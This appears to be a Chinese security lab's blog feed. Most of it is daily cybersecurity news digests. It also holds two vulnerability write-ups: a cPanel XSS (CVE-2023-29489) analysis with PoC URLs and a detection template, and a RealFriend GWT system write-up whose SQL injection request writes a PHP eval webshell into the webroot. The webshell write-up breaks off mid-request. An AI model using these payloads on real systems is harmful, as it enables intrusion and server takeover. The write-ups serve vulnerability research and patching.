网络安全日报 2023年05月05日
1、ScarCruft组织使用大型LNK文件传递RokRAT恶意软件
https://securityaffairs.com/145622/apt/scarcruft-apt-new-infection-chains.html Check Point研究人员报告说,自2022年以来,在与朝鲜相关的ScarCruft APT组织(又名APT37,Reaper和Group123)的攻击中观察到的感染链已停止严重依赖恶意文档来传递恶意软件,而是开始使用嵌入恶意负载的超大LNK文件。ScarCruft至少自2012年以来一直活跃,它在2018年2月初成为头条新闻,当时研究人员透露,APT组织利用Adobe Flash Player中的零日漏洞向韩国用户提供恶意软件。
2、撞库攻击泄露了美联航医疗保健会员数据
https://www.hipaajournal.com/credential-stuffing-attack-exposed-united-healthcare-member-data/ 联合医疗保健(UHC)已开始通知某些成员,由于UHC移动应用程序上的撞库攻击,他们的一些受保护的健康信息可能已泄露给未经授权的个人。撞库是一种攻击,其中一个平台的违规行为中获得的用户名和密码组合用于访问不相关平台上的帐户。只有当用户名和密码在多个平台上重复使用时,这些攻击才能成功。受到未经授权的访问的帐户包括姓名,出生日期,地址,健康保险会员ID号,服务日期,提供者名称,索赔详细信息以及组名称和编号等信息
3、Oracle Opera漏洞(CVE-2023-21932)可能会给连锁酒店带来麻烦
https://www.helpnetsecurity.com/2023/05/02/cve-2023-21932/ 研究人员警告说,Oracle Opera(一种广泛用于大型酒店和度假村连锁酒店的物业管理系统)中最近修补的一个漏洞(CVE-2023-21932)比甲骨文所说的更为严重,并且可能很容易被未经身份验证的远程攻击者利用来访问敏感信息。更重要的是,这些系统经常暴露在互联网上,并不难找到。根据研究人员的说法,可以在Shodan上检索到它们,并且他发现的每一个系统都没有打补丁。
4、德国IT提供商Bitmarck遭受网络攻击
https://securityaffairs.com/145568/hacking/bitmarck-cyberattack.html Bitmarck是德国最大的社会保险公司IT服务提供商之一,近日宣布遭受了网络攻击。由于网络攻击,它已将其所有系统脱机。该事件影响了由BITMARCK运营IT的法定健康保险公司,该公司立即向有关部门报告了这一事件。该公司排除了数据泄露,它指出存储在EHR中的患者数据过去和将来都不会受到攻击的威胁。
5、T-Mobile披露自2023年初以来的第二次数据泄露
https://www.bleepingcomputer.com/news/security/t-mobile-discloses-second-data-breach-since-the-start-of-2023/ T-Mobile披露了2023年的第二次数据泄露事件,此前发现攻击者从2023年2月下旬开始访问了数百名客户的个人信息一个多月。与T-Mobile之前报告的数据泄露事件(其中最新一次影响了37万人)相比,这一事件仅影响了836名客户。尽管如此,暴露的信息量仍然非常广泛,并使受影响的个人面临身份盗用和网络钓鱼攻击。
6、APT-Q-27使用双重DLL侧加载来逃避检测
https://www.bleepingcomputer.com/news/security/hackers-start-using-double-dll-sideloading-to-evade-detection/ 一个名为“Dragon Breath”、“Golden Eye Dog”或“APT-Q-27”的APT黑客组织正在展示一种新的攻击趋势,即使用经典的DLL侧加载技术的多种复杂变化来逃避检测。这些攻击变种从一个初始向量开始,该向量利用一个安全的应用程序,最常见的是Telegram,它侧加载第二阶段的有效负载,有时也是无毒的,反过来又侧加载恶意软件加载程序DLL。之后,恶意加载程
7、研究人员发现BGP协议实现-FRRouting中的拒绝服务(DoS)漏洞
https://securityaffairs.com/145676/security/bgp-frrouting-flaws.html 研究人员发现了BGP边界网关协议中的安全漏洞,可以将其武器化以在易受攻击的BGP对等点上实现拒绝服务(DoS)攻击。本次发现的3个漏洞存在于FRRouting的8.4版中,FRRouting是一种适用于Linux和Unix平台的主流开源互联网路由协议套件。它目前被NVIDIA Cumulus、DENT和SONiC等多家供应商使用,所以本次安全漏洞也构成供应链风险。研究人员在对7种不同的BGP协议实现(FRRouting、BIRD、OpenBGPd、Mikr
8、黑客利用TBK DVR设备中5年未修补的漏洞
https://www.bleepingcomputer.com/news/security/hackers-exploit-5-year-old-unpatched-flaw-in-tbk-dvr-devices/ 黑客正在积极利用暴露的TBK DVR(数字视频录制)设备中未修补的2018年身份验证绕过漏洞。DVR是安全监控系统不可或缺的一部分,因为它们可以记录和存储摄像机录制的视频。TBK Vision 的网站声称其产品部署在银行、政府机构、零售业等。由于这些DVR服务器用于存储敏感的安全录像,因此它们通常位于内部网络上以防止未经授权访问录制的视频。不幸的是,这使得它们对威胁行为者具有吸
9、谷歌推出无密码登录功能-Passkey
https://www.freebuf.com/news/365448.html The Hacker News 网站披露谷歌又“玩出了”新花样,推出一项名为 Passkey 的新功能,用户可以无需密码,使用更安全、更简单、更快速的方式登录其谷歌账号。
10、91% 企业认为 Deepfake 类型诈骗威胁日益严重
https://www.ithome.com/0/689/664.htm 根据身份认证专业机构 Regula 公布的最新报告,Deepfake 类型的欺诈案件正快速上升,29% 的企业遭受过这种类型的欺诈,91% 的受访企业认为该威胁已日益严重。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
cPanel XSS漏洞分析研究(CVE-2023-29489)
一、漏洞原理
漏洞简述
cPanel 是一套在网页寄存业中最享负盛名的商业软件,是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件;提供了足够强大和相当完整的主机管理功能,诸如:Webmail 及多种电邮协议、网页化 FTP 管理、SSH 连线、数据库管理系统、DNS 管理等远端网页式主机管理软件功能。
该漏洞可以无身份验证情况下利用,无论cPanel管理端口2080, 2082, 2083, 2086是否对外开放
漏洞影响范围
供应商:cPanel
产品:cPanel
确认受影响版本:< 11.109.9999.116
修复版本:11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31
漏洞分析
本漏洞的漏洞点来自系统中涉及交互的关键变量未进行转义或过滤处理,导致攻击者可以构造恶意代码作为输入进行利用。
Httpd.pm:
elsif ( 0 == rindex( $doc_path, '/cpanelwebcall/', 0 ) ) {
# First 15 chars are “/cpanelwebcall/”
_serve_cpanelwebcall(
$self->get_server_obj(),
substr( $doc_path, 15 ),
);
}
上述代码说明任何路径均会被路由到,包括目录后的字符部分。
其中涉及函数_serve_cpanelwebcall:
sub _serve_cpanelwebcall ( $server_obj, $webcall_uri_piece ) {
require Cpanel::Server::WebCalls;
my $out = Cpanel::Server::WebCalls::handle($webcall_uri_piece);
$server_obj->respond_200_ok_text($out);
return;
}
其中局部变量out为handle函数的返回值,是参数webcall_uri_piece的处理结果。
sub handle ($request) {
my $id = extract_id_from_request($request);
substr( $request, 0, length $id ) = q<>;
Cpanel::WebCalls::ID::is_valid($id) or do {
die _http_invalid_params_err("Invalid webcall ID: $id");
};
handle函数主要先从request提取id,之后根据id情况进行处理
sub _http_invalid_params_err ($why) {
return Cpanel::Exception::create_raw( 'cpsrvd::BadRequest', $why );
}
_http_invalid_params_err函数主要是返回错误信息
进一步分析发现Httpd::ErrorPage下的 message_html变量未做任何处理,可被该漏洞利用
补丁部分
在最新版本cPanel可以看到针对该漏洞进行修复
Cpanel/Server/Handlers/Httpd/ErrorPage.pm:
++ use Cpanel::Encoder::Tiny ();
... omitted for brevity ...
++ $var{message_html} = Cpanel::Encoder::Tiny::safe_html_encode_str( $var{message_html} );
二、漏洞复现实战
漏洞复现
首先以某个cPanel target为例
之后根据POC进行复现
POC:
http://example.com/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2082/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
http://example.com:2086/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
注:其他端口也有可能存在该漏洞
requests:
- method: GET
path:
- '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'
matchers:
- type: word
words:
- '<img src=x onerror="prompt(1)">'
执行POC
漏洞修复
建议更新至版本11.109.9999.116、 11.108.0.13 、11.106.0.18 和 11.102.0.31
启用cPanel 自动更新功能
结束语
本文主要介绍了CVE-2023-29489 cPanel XSS漏洞的原理分析及复现过程,漏洞主要由于涉及交互的关键变量未进行转义或过滤处理,从而造成攻击者可以在无身份验证情况下进行利用。
网络安全日报 2023年05月04日
1、Magecart仿造出逼真的在线支付界面
https://www.malwarebytes.com/blog/threat-intelligence/2023/04/kritec-art研究人员在跟进Magecart威胁行为体信用卡窃取器活动时,发现几乎能以假乱真的在线付款WEB界面和表格,威胁行为者使用了受感染商店的原始徽标,并自定义了逼真的Web界面,以劫持结帐页面。此外还发现恶意软件作者不仅精通网页设计,在每个表单字段中使用适当的语言(法语)制作欺诈性付款表格。
2、山寨版Minecraft Android游戏隐藏广告软件
https://www.bleepingcomputer.com/news/security/android-minecraft-clones-with-35m-downloads-infect-users-with-adware/Minecraft是一款流行的沙盒游戏,每月有1.4亿活跃玩家,许多游戏发行商都试图重新创建它。研究人员发现全球约有3500万Android用户下载了隐藏广告软件的山寨Minecraft游戏,山寨游戏感染了带有Android广告软件“HiddenAds”的设备,会在后台偷偷加载广告,但游戏屏幕上不会显示任何内容,为其运营商创收。目前所有有问题的应用程序都已从应用商店
3、ViperSoftX新变种以密码管理器为目标
https://www.bleepingcomputer.com/news/security/vipersoftx-info-stealing-malware-now-targets-password-managers/研究人员发现ViperSoftX新变种现在针对的加密货币钱包的攻击行动比以前更多,该恶意软件正在检查与两个密码管理器(即1Password和KeePass 2)相关的文件,试图窃取存储在其浏览器扩展中的数据,威胁行为体可能会在攻击的后期阶段以此类恶意活动为目标。
5、Zyxel发布修复防火墙漏洞的安全补丁
https://thehackernews.com/2023/04/zyxel-firewall-devices-vulnerable-to.htmlZyxel发布了针对其防火墙设备中一个严重安全漏洞的补丁,该漏洞被记录为CVE-2023-28771,在 CVSS 评分系统中的评分为 9.8,可被利用在受影响的系统上实现远程代码执行。此外Zyxel还解决了影响选定防火墙版本( CVE-2023-27991 ,CVSS 分数:8.8)的高严重性身份验证后命令注入漏洞,该漏洞可能允许经过身份验证的攻击者远程执行某些操作系统命令。
6、FDA发出警告Illumina医疗设备易受远程网络攻击
https://www.securityweek.com/fda-cisa-illumina-medical-devices-vulnerable-to-remote-hacking美国政府部门正在通知医疗保健提供者和实验室人员,一些Illumina医疗设备使用的组件可能受到允许远程黑客攻击的漏洞的影响。该供应商发布了补丁和缓解措施,并发布了公告,告知客户必须采取哪些步骤来防止潜在的利用。目前尚未发现这些漏洞在野利用的证据,但警告黑客可以利用这些漏洞远程控制设备,或者更改设备或用户网络上的配置、设置、软件或数据。
7、APT28利用伪造的Windows更新指南攻击乌克兰政府
https://www.bleepingcomputer.com/news/security/hackers-use-fake-windows-update-guides-to-target-ukrainian-govt/乌克兰CERT称APT28利用伪造的Windows更新指南针对乌克兰政府机构和军事组织发起钓鱼邮件攻击。攻击者为了伪装成目标政府的系统管理员,使用在攻击准备阶段通过未知方式获得的真实员工姓名创建了@outlook.com电子邮件地址。恶意电子邮件不是关于升级Windows系统的合法说明,而是建议收件人运行PowerShell命令。此命令在计算机上下载PowerShell脚本,
8、研究人员发现AresLoader正在通过伪装的GitLab存储库传播
https://blog.cyble.com/2023/04/28/citrix-users-at-risk-aresloader-spreading-through-disguised-gitlab-repo/近期,Cyble研究和情报实验室(CRIL)观察到一个名为AresLoader的新加载程序,该加载程序已用于传播多种类型的恶意软件家族。AresLoader是一种用C语言编写的加载程序恶意软件,于2022年首次出现在网络犯罪论坛和电报频道中。此加载程序在恶意软件即服务(MaaS)模型上可用,由负责 AiD Locker勒索软件的同一威胁参与者(TA)开发。该组织的成员还被怀疑与俄罗斯黑
9、LockBit和Cl0p勒索软件团伙利用PaperCut漏洞进行攻击
https://www.malwarebytes.com/blog/news/2023/04/lockbit-and-cl0p-are-actively-exploiting-papercut-vulnerabilities研究人员发现LockBit和Cl0p勒索软件团伙正在利用PaperCut漏洞进行攻击。这些漏洞能够攻击PaperCut服务器并干扰其正常工作,制造混乱。安全专家提醒用户及时更新PaperCut软件以获得相关补丁,以免受到攻击。LockBit和Cl0p是目前勒索软件领域中比较活跃的黑客团伙,经常利用漏洞入侵受害者系统部署勒索软件。
10、恶意软件伪装成ChatGPT桌面客户端窃取Chrome登录数据
https://www.helpnetsecurity.com/2023/05/02/chatgpt-infostealer/研究人员发现一个伪装成ChatGPT Windows桌面客户端的窃密木马,该窃密木马能够从Google Chrome登录数据文件夹中复制保存的凭据。ChatGPT 尚未发布官方桌面客户端,但这个虚假版本看起来与人们的预期非常相似。该窃密木马通过一个zip存档进行分发,其中包含一个名为ChatGPT For Windows Setup 1.0.0.exe的文件。在安装过程中,恶意软件在后台运行,并使用Havelock开始提取Chrome登录数据,Havelock是一种从基
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年04月28日
1、伊朗APT 35组织使用一种新恶意软件BellaCiao
https://securityaffairs.com/145354/malware/iran-charming-kitten-bellaciao.html 与伊朗有联系的APT组织Charming Kitten(又名 APT35、Phosphorus、Newscaster和Ajax安全团队)使用一种名为BellaCiao的新型恶意软件攻击美国、欧洲、中东和印度的受害者。BellaCiao充当个性化的投放程序,用于将其他恶意有效负载传送到基于受害者的机器上。专家们尚未确定最初的感染媒介,但他们认为攻击者使用了Microsoft Exchange漏洞利用链(如 ProxyShell、Proxy
2、Telegram出现新的针对macOS系统的窃取器
https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/ 研究人员发现近期在Telegram上宣传一种名为Atomic macOS Stealer (AMOS)的新型信息窃取恶意软件。该恶意软件专门针对macOS而设计,当前还在不断添加新功能以使其更有效。4月25日Telegram上显示了该恶意软件的最新功能,可以从受害者的机器上窃取各种类型的信息,包括钥匙串密码、完整的系统信息、桌面和文档文件夹中的文件,甚至是 macOS 密码。研究人员对该恶意软件进行
3、PrestaShop修复了允许用户删除数据库的漏洞
https://www.bleepingcomputer.com/news/security/prestashop-fixes-bug-that-lets-any-backend-user-delete-databases/ 开源电子商务平台PrestaShop发布了一个新版本,该版本解决了一个严重漏洞,该漏洞允许任何后台用户写入、更新或删除 SQL 数据库,无论其权限如何。后台用户包括所有者、管理员、销售代表、客户支持代理、订单处理人员、数据输入人员等。该漏洞编号为CVE-2023-30839(CVSS v3.1 得分:9.9),可能对受影响的企业造成重大损害或服务中断,并影响所有8.0.
4、思科披露服务器管理工具中的XSS零日漏洞
https://www.bleepingcomputer.com/news/security/cisco-discloses-xss-zero-day-flaw-in-server-management-tool/ 思科披露了该公司Prime Collaboration Deployment (PCD) 软件中的一个零日漏洞,该漏洞编号为CVE-2023-20060,由北约网络安全中心 (NCSC)在Cisco PCD 14和更早版本的基于Web的管理界面中发现,可被用于跨站点脚本攻击。虽然思科分享了有关该漏洞影响的信息,但需要在下个月才能发布安全更新。当前尚未发现该漏洞任何恶意使用的证据。
5、网络犯罪分子利用 PaperCut 漏洞分发 Cl0p 和 LockBit 勒索软件
https://securityaffairs.com/145377/hacking/papercut-exploits-cl0p-lockbit-ransomware.html 微软透露,最近针对 PaperCut 服务器的攻击旨在分发 Cl0p 和 LockBit 勒索软件。
6、谷歌获得法院命令以中断 CryptBot 分发
https://thehackernews.com/2023/04/google-gets-court-order-to-take-down.html 谷歌周三表示,它在美国获得了一项临时法院命令,以破坏基于 Windows 的信息窃取恶意软件CryptBot的分发并“减缓”其增长。据估计,CryptBot在 2022 年已感染超过 670,000 台计算机,其目标是窃取 Google Chrome 用户的敏感数据,例如身份验证凭据、社交媒体帐户登录和加密货币钱包。
7、谷歌为 Chrome 扩展添加了新的风险评估工具
https://www.helpnetsecurity.com/2023/04/25/risk-assessment-chrome-extensions/ Google 为 Google Workspace 管理员和安全团队提供了一种新工具,用于评估不同的 Chrome 扩展程序可能给用户带来的风险:Spin.AI App Risk Assessment。该工具可通过 Chrome 浏览器云管理控制台使用,并为管理员提供有关潜在安全威胁的宝贵见解。
8、黑客演示如何“接管”欧洲航天局卫星
https://www.freebuf.com/news/365086.html The record 网站披露,网络安全研究人员将在本周展示如何夺取欧洲航天局(ESA)卫星控制权,此次演示也被称为世界上第一次卫星网络攻击演习。法国国防巨头泰雷兹(Thales)的网络安全专家宣布将与 ESA 团队成员一起,在巴黎举行的 CYSAT 会议上对攻击场景进行深入解读。
9、OpenAI 将隐身模式引入 ChatGPT
https://cybernews.com/privacy/openai-introduces-chatgpt-incognito-mode/ OpenAI为不希望自己的对话历史被保存、或被用于训练大型语言模型的用户创建了ChatGPT "隐身模式"。如果禁用,当用户开始聊天对话时,通常保存在 ChatGPT 侧边栏中的历史对话将不再出现。
10、安全专家用30块显卡搭建密码破解器,每秒可验证6.2万亿个NTLM哈希
https://www.ithome.com/0/689/098.htm 安全专家凯文・米特尼克(Kevin Mitnick)近日使用 24 块 RTX 4090 显卡和 6 块 RTX 2080 显卡,组建了一台用于破解密码的超级计算机,并将称之为“badass password cracker”。他在推文中表示:“在 NTLM(基于挑战 / 应答的身份验证协议)上每秒验证超过 6.2 万亿个哈希。具体可能受工作量和其它因素影响,但这是平均值”。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年04月27日
1、Mirai僵尸网络利用TP-Link路由器漏洞进行传播
https://www.bleepingcomputer.com/news/security/tp-link-archer-wifi-router-flaw-exploited-by-mirai-malware/ Mirai恶意软件僵尸网络正在积极利用跟踪为CVE-2023-1389的TP-Link Archer A21 (AX1800) WiFi路由器漏洞将设备整合到DDoS(分布式拒绝服务)中。该问题是TP-Link Archer AX21路由器Web管理界面的区域设置API中的高危 (CVSS v3: 8.8) 未经身份验证的命令注入漏洞。该漏洞于2023年1月被披露给 P-Link
2、APT35部署PowerLess后门发动钓鱼攻击
https://thehackernews.com/2023/04/iranian-hackers-launch-sophisticated.html 网络安全公司Check Point观察到伊朗民族国家威胁参与体APT35(或Mint Sandstorm,以前称为 Phosphorus)与针对以色列的新一波网络钓鱼攻击有关,该攻击旨在部署名为PowerLess的后门的更新版本。APT35至少从2011年开始活跃,通过利用虚假社交媒体角色、鱼叉式网络钓鱼技术和暴露在 nternet上的应用程序中的N-day漏洞来获取初始访问权限并投放各种有效负载(包括勒索软件)。
3、Google Ads 被滥用以分发新的 LOBSHOT 恶意软件
https://cyware.com/news/google-ads-abused-to-distribute-new-lobshot-malware-ef54547d Elastic 安全实验室发现了 LOBSHOT,这是一种以前未知的 hVNC 恶意软件,它冒充合法软件获取经济利益,并通过恶意广告(例如 Google Ads)进行推广,以扩大其影响范围并实施攻击。它针对 32 个 Chrome 扩展程序、9 个 Edge 钱包扩展和 11 个 Firefox 钱包扩展,使威胁行为者能够窃取加密货币资产。
4、 FIN7 黑客利用最近的 Veeam Backup & Replication漏洞
https://www.securityweek.com/fin7-hackers-caught-exploiting-recent-veeam-vulnerability 据网络安全公司 WithSecure 报道,网络犯罪组织 FIN7 在最近的攻击中被发现利用未打补丁的 Veeam Backup & Replication 实例。
5、Wiz机构披露利用阿里云docker逃逸漏洞大杀四方的细节
https://www.freebuf.com/articles/network/364411.html Wiz机构 在阿里云的两个热门服务 ApsaraDB RDS for PostgreSQL 和 AnalyticDB for PostgreSQL中发现了一系列严重漏洞。这些被称为#BrokenSesame的漏洞可能允许未经授权访问阿里云客户的 PostgreSQL数据库,并能够对阿里巴巴的两个数据库服务执行供应链攻击,从而导致对阿里巴巴数据库服务的 RCE。
6、RSAC 2023大会上,多家公司发布由生成式AI驱动的新一代网络安全工具
https://www.secrss.com/articles/54122 今年,与 RSAC 相关的产品发布热潮从大会开幕当天就已经开始,而生成式 AI 技术成为了许多产品的前沿技术核心。到目前为止,包括谷歌云和埃森哲等公司的安全运营团队已发布了基于人工智能的生成式内容产品。
7、《反间谍法》修订,将对国家机关实施网络攻击等行为明确为间谍行为
http://www.news.cn/2023-04/26/c_1129568977.htm 新修订的反间谍法将于7月1日起施行,新修订的反间谍法将“针对国家机关、涉密单位或者关键信息基础设施等实施网络攻击等行为”明确为间谍行为。
8、ViperSoftX升级了先进的反检测技术
https://cyware.com/news/vipersoftx-upgraded-with-sophisticated-anti-detection-techniques-7bb40000 在信息窃取者 ViperSoftX 采用新的反检测功能后,澳大利亚、日本和美国的消费者和企业部门已经有大量受害者。企业部门占受影响受害者总数的40%以上。最新版本的信息窃取器具有从两个密码管理器(如 KeePass 2 和 1Password)窃取密码的功能。
9、不安全的默认配置使Apache Superset易遭受RCE 攻击
https://thehackernews.com/2023/04/apache-superset-vulnerability-insecure.html 该漏洞被追踪为CVE-2023-27524(CVSS 评分:8.9),影响 2.0.1 及以下的版本,并且与默认 SECRET_KEY 的使用有关,攻击者可能会滥用该默认 SECRET_KEY 来验证和访问互联网上未经授权的服务器。
10、泛微Ecology SQL注入漏洞安全风险通告
https://www.secrss.com/articles/54070 近日,奇安信CERT监测到泛微Ecology SQL注入漏洞(QVD-2023-9849),泛微 Ecology OA 系统对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
网络安全日报 2023年04月26日
1、安全厂商发现窃密软件ViperSoftX新变种
https://www.trendmicro.com/en_us/research/23/d/vipersoftx-updates-encryption-steals-data.html ViperSoftX是一种信息窃取软件,据报道主要针对加密货币,因其在日志文件中隐藏恶意代码的执行技术而成为2022年的头条新闻。研究人员观察到ViperSoftX近期进行了版本更新,逃避了初始加载程序检测,并通过破解、密钥生成、激活程序和非恶意打包程序使初始包加载程序变得更加具有欺骗性。此外还观察到更复杂的加密和基本的反分析技术。
2、APC警告UPS软件中存在严重RCE漏洞
https://www.bleepingcomputer.com/news/security/apc-warns-of-critical-unauthenticated-rce-flaws-in-ups-software/ APC(施耐德电气旗下)是最受欢迎的UPS品牌之一。其产品广泛应用于消费者和企业市场,包括政府、医疗保健、工业、IT 和零售基础设施。本月早些时候,该供应商发布了一份安全通知 ,警告有三个影响其产品的漏洞,这些漏洞会导致APC的Easy UPS在线监控软件容易受到未经身份验证的任意远程代码执行攻击,允许黑客接管设备,在最坏的情况下,甚至会完全禁用其功能。
3、SolarWinds平台修补了两个高危漏洞
https://www.securityweek.com/solarwinds-platform-update-patches-high-severity-vulnerabilities/ SolarWinds平台最近修补的两个高危漏洞,其中最严重的是CVE-2022-36963(CVSS 得分为 8.8),被描述为SolarWinds基础设施监控和管理解决方案中的命令注入错误,该漏洞可以被远程利用来执行任意命令,成功利用此漏洞需要攻击者拥有有效SolarWinds Platform 管理员帐户的凭据。第二个漏洞跟踪为CVE-2022-47505(CVSS 得分为 7.8),被描述为本地权限
4、SLP(服务定位协议)漏洞可被用于DDoS放大攻击,倍数高达2200倍
https://securityaffairs.com/145295/hacking/slp-flaw-ddos-attacks.html 影响服务定位协议 ( SLP)的高危安全漏洞(CVE-2023-29552,CVSS 评分:8.6)可被威胁行为者利用以进行反射型 DDoS 放大攻击。该漏洞可实现高达2200倍的放大倍数,是有史以来最大的放大攻击之一。 该漏洞影响全球 2,000 多个组织和 54,000 多个公开暴露在 Internet 上的 SLP 实例,包括 VMWare ESXi Hypervisor、Konica Minolta 打印机、Planex 路由器、IBM 集成管理
5、VMware 解决了 Pwn2Own Vancouver 2023 上展示的两个零日漏洞
https://securityaffairs.com/145287/security/vmware-fixes-critical-zero-days-pwn2own.html VMware 发布了安全更新,以解决两个零日漏洞(CVE-2023-20869、CVE-2023-20870),这两个漏洞可以被链接起来以在Workstation和 Fusion 软件管理程序上实现任意代码执行。
6、一个新的 Mirai 僵尸网络变体以 TP-Link Archer A21 为目标
https://securityaffairs.com/145278/hacking/mirai-botnet-cve-2023-1389-tp-link-archer-a21.html Mirai 僵尸网络在最近的攻击中开始利用 TP-Link Archer A21 中的CVE-2023-1389 漏洞(又名ZDI-CAN-19557/ZDI-23-451 ),CVE-2023-1389 漏洞是一个未经身份验证的命令注入漏洞,存在于 TP-Link Archer AX21 路由器的 Web 管理界面的语言环境 API 中。
7、谷歌研究人员在英特尔 TDX 中发现了多个安全问题
https://securityaffairs.com/145268/security/intel-tdx-flaws.html 谷歌云安全和Project Zero研究人员与英特尔专家合作,在英特尔信任域 扩展(TDX) 中发现了多个漏洞。
8、汽车品牌标致泄露了南美国家秘鲁的用户数据
https://securityaffairs.com/145253/security/peugeot-leaks-access-to-user-information-in-south-america.html Stellantis旗下的法国汽车品牌Peugeot泄露了其在秘鲁的用户数据。
9、谷歌云推出 Security AI Workbench 以加快威胁检测和分析速度
https://thehackernews.com/2023/04/google-cloud-introduces-security-ai.html 谷歌的云部门推出了Security AI Workbench,该工作台利用生成式 AI 模型来更好地了解威胁态势。为网络安全套件提供支持的是 Sec-PaLM,这是一种专门的大型语言模型 ( LLM )。
10、新型瞬态执行侧信道攻击能从英特尔处理器中窃取数据
https://www.freebuf.com/news/364747.html ,近日在 Arxiv.org 上发表的一篇技术论文揭示了一种针对多代英特尔CPU的攻击手法——利用新的侧信道攻击,让数据通过 EFLAGS 寄存器泄露。这一与众不同的侧信道攻击由清华大学、马里兰大学和中国教育部计算机实验室 (BUPT) 的研究人员共同发现,它不像许多其他侧信道攻击那样依赖缓存系统,而是利用瞬态执行中 EFLAGS 寄存器变化的缺陷,影响JCC(条件代码跳转)指令的时序,进而通过时序分析从用户内存空间中提取数据。
免责声明
以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。
记一次某应用虚拟化系统远程代码执行
漏洞简介
微步在线漏洞团队通过“X漏洞奖励计划”获取到瑞友天翼应用虚拟化系统远程代码执行漏洞情报(0day),攻击者可以通过该漏洞执行任意代码,导致系统被攻击与控制。瑞友天翼应用虚拟化系统是基于服务器计算架构的应用虚拟化平台,它将用户各种应用软件集中部署到瑞友天翼服务集群,客户端通过WEB即可访问经服务器上授权的应用软件,实现集中应用、远程接入、协同办公等。
漏洞是因为未授权接口在接收参数时没有进行处理校验,存在 SQL 注入漏洞,又因为集成环境中的 mysql 拥有写入文件的权限,所以写入 webshell 最终导致代码执行。
影响版本
5.x <= 瑞友天翼应用虚拟化系统(GWT System) <= 7.0.2.
目前相关漏洞已修复。
环境搭建
从师傅处拷到的安装包 Gwt7.0.2.1.exe 默认模式安装,最后
在线注册获取试用 http://mop.realor.cn/TrialReg.aspx
注册成功后
登录页面 默认账号密码是 Admin/123
默认路径在 C:/Program Files (x86)/RealFriend/Rap Server/WebRoot
默认数据库配置地址 C:\Program Files (x86)\RealFriend\Rap Server\data\Config\CasDbCnn.dat
账号密码需要将其中的 # 替换为 = 并进行 base64 解码
漏洞复现与分析
通过 http://192.168.222.148/RAPAgent.XGI?CMD=GetRegInfo 查看版本信息
为了方便查看后端实际执行的完整sql,我们可以使用框架提供的 getLastSql() 方法来 获取最近一次执行的SQL语句
注入一IndexController.class.phpdologin
webroot/casweb/Home/Controller/IndexController.class.php:dologin
我们看到其中的 SQL 语句以及对该函数的请求路由
http://www.casweb.cn.x/index.php?s=/Index/dologin/name/admin/pwd/c4ca4238a0b923820dcc509a6f75849b
构造数据包 并打印出相对应的 sql 语句
因为默认没有开启验证码,所以可以直接到达 SQL 语句处
因为搭建环境时,使用了集成好的mysql 环境,拥有 DBA 的权限,所以可以在文件夹任意位置写入内容
show global variables like '%secure%';
secure_file_priv='' #允许写入到任何文件夹
利用报错信息得到项目的绝对路径
构造payload
POST /index.php?s=/Index/dologin/name HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 221
name=1')+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, '<?php eval($_REQUEST["cmd"]);?>' into outfile 'C:/Program Files (x86)/RealFriend/Rap Server/WebRoot/dologin.php'#
查询管理员用户的账户和密码
注入二__ConsoleExternalUploadApi.XGI
webroot/ConsoleExternalUploadApi.XGI
获取到三个参数,当三个参数都不为空时,调用 getfarminfo 来进行处理
webroot/Function.XGI
webroot/Common.XGI
对 key 值没有做任何校验,所以可以构造 payload 实现注入
POST /ConsoleExternalUploadApi.XGI HTTP/1.1
Host: 192.168.222.148
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 46
Content-Type: application/x-www-form-urlencoded
